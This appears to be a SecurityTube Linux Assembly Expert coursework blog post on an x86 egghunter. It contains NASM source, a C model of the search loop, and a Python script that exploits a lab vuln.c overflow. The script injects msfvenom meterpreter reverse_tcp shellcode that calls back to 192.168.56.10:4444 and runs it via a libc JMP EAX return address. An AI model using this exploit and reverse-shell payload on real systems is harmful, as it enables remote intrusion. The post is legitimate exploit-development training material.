SLAE: 0x3 Egghunters
Sun 02 April 2017
0x1 Requirements
Write a custom egghunter that works with custom shellcode.
Write a custom egghunter that uses the address held in esp as its starting point and searches upwards or downwards through memory, depending on whether the first instruction in the search loop increments eax by 1 or subtracts 1 from it.
While looking through examples on shellstorm I saw the idea of subtracting 1 from the egg itself in order to avoid a duplicate egg in the completed shellcode, which I found nice, so I've implemented this in my egghunter.
0x2 Demo: putting it all together
0x3 Code walkthrough
; Filename: small_egghunter.nasm
; Author: Plaix
; Website: http://slacklabs.be
;
; Purpose:
; Searches up (or down, if the 'inc eax' in the loop is changed to 'dec eax') for our egg, which is only 4 bytes
; Compile:
; --------
;
; nasm -f elf32 -o small_egghunter.o small_egghunter.nasm
; ld -o small_egghunter small_egghunter.o
global _start
section .text
_start:
mov eax,esp ; get an address on the stack that's valid, used as the starting point
; we will mov 0xdeadbeee into ebx instead of our egg
; and inc it by 1 to avoid our egghunter finding the 0xdeadbeef value in its own
; code bytes (the mov immediate) instead of at the right spot
mov ebx,0xdeadbeee
inc ebx ; ebx = 0xdeadbeef, the egg we search for
loop:
inc eax ; step one byte up ('dec eax' here would search downwards)
cmp dword [eax],ebx ; does the dword at eax equal the egg?
jnz loop
; if the egg is found, eax points at the egg itself:
; skip the 4-byte egg and jump to the shellcode that follows it
; (play nice with the python script, which places the egg right in front of the NOP sled)
add eax,0x4
push eax
ret
; note: there is no page-validity check (no access() syscall), so the loop
; only stays safe while it walks mapped stack memory between esp and the egg
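As an added illustration that is not part of the original post, the following C model replays the search loop over a constructed stack image and shows why the 0xdeadbeee/inc ebx trick matters: a naive variant that embeds the full egg as its mov immediate (constructed here for comparison) stops inside its own bytes, while the post's hunter skips past itself to the real egg.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define EGG 0xdeadbeefu   /* the egg as a dword; "\xef\xbe\xad\xde" in memory */

/* The post's 18-byte egghunter (mov ebx,0xdeadbeee ; inc ebx). */
static const uint8_t hunter_post[18] = {
    0x89,0xe0, 0xbb,0xee,0xbe,0xad,0xde, 0x43, 0x40, 0x39,0x18, 0x75,0xfb,
    0x83,0xc0,0x04, 0x50, 0xc3 };
/* Constructed naive variant: mov ebx,0xdeadbeef ; nop. Its immediate puts a
   second copy of the egg into the hunter's own code bytes. */
static const uint8_t hunter_naive[18] = {
    0x89,0xe0, 0xbb,0xef,0xbe,0xad,0xde, 0x90, 0x40, 0x39,0x18, 0x75,0xfb,
    0x83,0xc0,0x04, 0x50, 0xc3 };

/* Software model of `loop: inc eax ; cmp dword [eax],ebx ; jnz loop ; add eax,4`
   over a byte array. 'esp' is the starting index; returns the index of the
   first payload byte, or -1 if the modelled region ends without a match. */
static long hunt(const uint8_t *mem, size_t len, size_t esp) {
    size_t eax = esp;
    for (;;) {
        eax++;                                   /* inc eax */
        if (eax + 4 > len) return -1;            /* no access() check in the real hunter */
        uint32_t dword = (uint32_t)mem[eax]      /* read the dword little-endian, as x86 does */
            | (uint32_t)mem[eax + 1] << 8
            | (uint32_t)mem[eax + 2] << 16
            | (uint32_t)mem[eax + 3] << 24;
        if (dword == EGG) return (long)(eax + 4); /* add eax,4 ; push eax ; ret */
    }
}

/* Constructed stack image: hunter at index 0, NOP sled, the egg at index 26,
   then a 4-byte stand-in payload at index 30. Returns where hunt() lands. */
static long run_with(const uint8_t hunter[18]) {
    uint8_t mem[64];
    memset(mem, 0x90, sizeof mem);
    memcpy(mem, hunter, 18);
    const uint8_t egg[4] = {0xef, 0xbe, 0xad, 0xde};
    memcpy(mem + 26, egg, 4);
    const uint8_t payload[4] = {0xcc, 0xcc, 0xcc, 0xcc};
    memcpy(mem + 30, payload, 4);
    return hunt(mem, sizeof mem, 0);             /* esp points at the hunter itself */
}

long payload_found_by_post_hunter(void)  { return run_with(hunter_post); }  /* 30: correct */
long payload_found_by_naive_hunter(void) { return run_with(hunter_naive); } /* 7: inside the hunter */
```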
0x4 Example
I've included a vuln.c program and this Python script, which uses the egghunter and a generated Linux meterpreter reverse_tcp shell to exploit the program.
#!/usr/bin/env python2
import os
import subprocess
# vuln.c takes two arguments: a 500-byte buffer (egg + shellcode)
# and a 60-byte buffer (egghunter, followed by the return address)
egg = "\xef\xbe\xad\xde"  # 0xdeadbeef, little-endian
'''
linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.10 LPORT=4444
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.56.10 -f py -b "\x00\x0a\xff\x60\x22\x27\x28\x29"
482 bytes
'''
buf = ""
buf += "\xd9\xe8\xbf\xf6\xd0\x96\x16\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x12\x31\x7d\x1a\x03\x7d\x1a\x83\xc5\x04\xe2"
buf += "\x03\xe1\x4d\xe1\x08\x51\x31\x5d\xa4\x54\x05\x07\xb1"
buf += "\xb8\xa8\x48\x56\x61\x5b\x89\xf0\xae\x91\x61\x02\xcf"
buf += "\xb4\x2d\x8b\x2e\xdc\xab\xd3\xe0\x70\x63\x6a\xe1\x30"
buf += "\x46\xec\x50\xb1\xe1\xec\x84\xbe\x11\x65\x47\x7f\xfa"
buf += "\x79\x49\x63\xf1\x31\x34\xa9\x8a\x6a\x4e\xd0\x12\x3a"
buf += "\x5c\xa3\x26\x8f\xdd\x3c\xc9"
# first buffer: the egg, a NOP sled, then the shellcode (500 bytes in total)
shBuf = egg + "\x90" * (500 - (len(buf) + 4)) + buf
print "Prepending shellcode with %i nops..." % (500 - (len(buf) + 4))
# earlier test payload (execve of /bin/cat //etc//hosts), kept commented out
#eggHunter="\x83\xc4\x32\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6f\x73\x74\x73\x68\x63\x2f\x2f\x68\x68\x2f\x2f\x65\x74\x89\xe1\x31\xd2\x50\x51\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xb3\x01\xcd\x80"
# small_egghunter.nasm assembled (18 bytes): mov eax,esp / mov ebx,0xdeadbeee / inc ebx /
# inc eax / cmp [eax],ebx / jnz / add eax,4 / push eax / ret
eggHunter = "\x89\xe0\xbb\xee\xbe\xad\xde\x43\x40\x39\x18\x75\xfb\x83\xc0\x04\x50\xc3"
#for x in range(len(buf)):
#    print "%i\t%s\t\\x%02x" % (x, buf[x], ord(buf[x]))
EIP = "\xf2\x1c\xe4\xb7"  # libc JMP eax (0xb7e41cf2), overwrites the saved return address
# second buffer: NOP sled, the egghunter, then the return address (60 + 4 bytes)
eggBuf = "\x90" * (60 - len(eggHunter)) + eggHunter + EIP
# run the exploit (the msfvenom bad-char list above excludes the shell metacharacters
# that would otherwise break these quoted arguments)
#os.system("gdb -q --args ./vuln " + shBuf + " " + eggBuf)
#os.system("./vuln " + shBuf + " " + eggBuf)
#subprocess.call('gdb -q --args ./vuln "' + shBuf + '" "' + eggBuf + '"', shell=True)
subprocess.call('./vuln "' + shBuf + '" "' + eggBuf + '"', shell=True)
0x0 Resources used:
Sysgrok: http://syscalls.kernelgrok.com/
Linux man pages: http://man7.org/linux/man-pages/index.html
shellstorm.org: http://shell-storm.org/shellcode/
exploit-db.com: https://www.exploit-db.com/shellcode/
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE - 827